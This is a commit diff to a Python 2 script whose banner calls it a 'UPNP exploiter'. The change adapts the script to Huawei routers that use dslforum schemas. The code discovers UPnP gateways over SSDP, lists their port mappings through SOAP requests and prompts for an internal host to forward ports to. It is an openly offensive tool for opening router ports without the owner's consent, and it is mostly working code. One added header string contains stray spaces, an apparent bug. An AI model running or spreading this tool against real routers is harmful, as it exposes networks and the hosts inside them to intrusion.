Made dslforum version, works with Huawei Hg658c and other Huawei devices (probably)

upnp.py

@@ -1,3 +1,4 @@
+"""Adapted the code to make a Huawei version that uses dslforum schemas"""
 #!/bin/python
 import urllib2, re, sys, select, socket
 
@@ -7,6 +8,12 @@
 tport = 49170;
 upnport = 1900;
 msg = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST: ssdp:all\r\nMAN: \"ssdp:discover\"\r\nMX: 1\r\n\r\n";
+welcome_msg = """##########################
+# UPNP exploiter         #
+# By: Anarchy Angel      #
+# www.dc414.org          #
+# Happy hacking :)       #
+##########################""";
 
 ###
 # Used to ping one target.
@@ -35,7 +42,7 @@ def target():
   while True:
    string, addr = s.recvfrom(1024);
    data.append([addr[0], string]);
-   print "Got some data";
+   print "Got some data from %s" % addr[0];
  except KeyboardInterrupt: 
   s.close();
   proc(data);
@@ -59,7 +66,7 @@ def lan():
    string, addr = res[0][0].recvfrom(1024);
    #data += string;
    data.append([addr[0], string]);
-   print "Got some data";
+   print "Got some data from %s" % addr[0];
  except KeyboardInterrupt: 
   s.close();
   proc(data);
@@ -76,10 +83,11 @@ def sploit(host):
  print "Trying to get some info from the target...";
  try:
   res = urllib2.urlopen(host).read();
+  print "Connected"
   res = res.replace("\r", "");
   res = res.replace("\n", "");
   res = res.replace("\t", "");
-  pres = res.split("<serviceId>urn:upnp-org:serviceId:WANIPConn1</serviceId>");
+  pres = res.split("<serviceId>urn:dslforum-org:serviceId:WANIPConn1</serviceId>");
   p2res = pres[1].split("</controlURL>");
   p3res = p2res[0].split("<controlURL>");
   ctrl = p3res[1];
@@ -93,8 +101,9 @@ def sploit(host):
   try:
    while True:
     opmsg = '<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetGenericPortMappingEntry xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingIndex>'+str(i)+'</NewPortMappingIndex></u:GetGenericPortMappingEntry></s:Body></s:Envelope>';
+    ctrl = p3res[1];  
     open_ports = urllib2.Request("http://"+rhost[1]+""+ctrl, opmsg);
-    open_ports.add_header("SOAPACTION", '"urn:schemas-upnp-org:service:WANIPConnection:1#GetGenericPortMappingEntry"');
+    open_ports.add_header("SOAPACTION", '"urn:dslforum-org  :service:WANIPConnection:1#GetGenericPortMappingEntry"');
     open_ports.add_header('Content-type', 'application/xml');
     open_res = urllib2.urlopen(open_ports).read();
     int1 = open_res.split('<NewInternalPort>');
@@ -112,9 +121,9 @@ def sploit(host):
     print intport+":"+extport+":"+address+":"+desc
     i=i+1;
   except Exception, e:
-   err=""
+   print e
  except Exception, e:
-  #print e;
+  print e;
   print "Failed to get anything from the target :/"
  IP = raw_input("IP of internal host to forward posts to: [192.168.1.100] ");
  if IP == "":
@@ -207,8 +216,8 @@ def proc(data):
    url = "http://"+host+":";
    port = re.findall("http:\/\/[0-9\.]+:(\d.+)", hdata);
    url += port[0];
-   p = urllib2.urlopen(url, timeout=3);
-   rd = re.findall("schemas-upnp-org:device:([^:]+)", p.read());
+   p = urllib2.urlopen(url, timeout=5);
+   rd = re.findall("dslforum-org:device:([^:]+)", p.read());
    if rd[0] == "InternetGatewayDevice":
     addr = re.findall("http://([^:]+)", url);
     vuln = "Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1";
@@ -236,12 +245,7 @@ def done(data):
   # Welcome msg
   ###
   print "";
-  print "##########################";
-  print "# UPNP exploiter         #";
-  print "# By: Anarchy Angel      #";
-  print "# www.dc414.org          #";
-  print "# Happy hacking :)       #";
-  print "##########################";
+  print welcome_msg
   exit(1);
  for info in data:
 #  if sys.argv[1] == "target":
@@ -257,12 +261,7 @@ def done(data):
  ###
  # Welcome msg
  ###
- print "##########################";
- print "# UPNP exploiter         #";
- print "# By: Anarchy Angel      #";
- print "# www.dc414.org          #";
- print "# Happy hacking :)       #";
- print "##########################";
+ print welcome_msg
  exit(1);
 
 ###
@@ -272,12 +271,7 @@ def usage():
  ###
  # Welcome msg
  ###
- print "##########################";
- print "# UPNP exploiter         #";
- print "# By: Anarchy Angel      #";
- print "# www.dc414.org          #";
- print "# Happy hacking :)       #";
- print "##########################";
+ print welcome_msg
  print "";
  print "upnp.py type ip";
  print "Types: lan/target";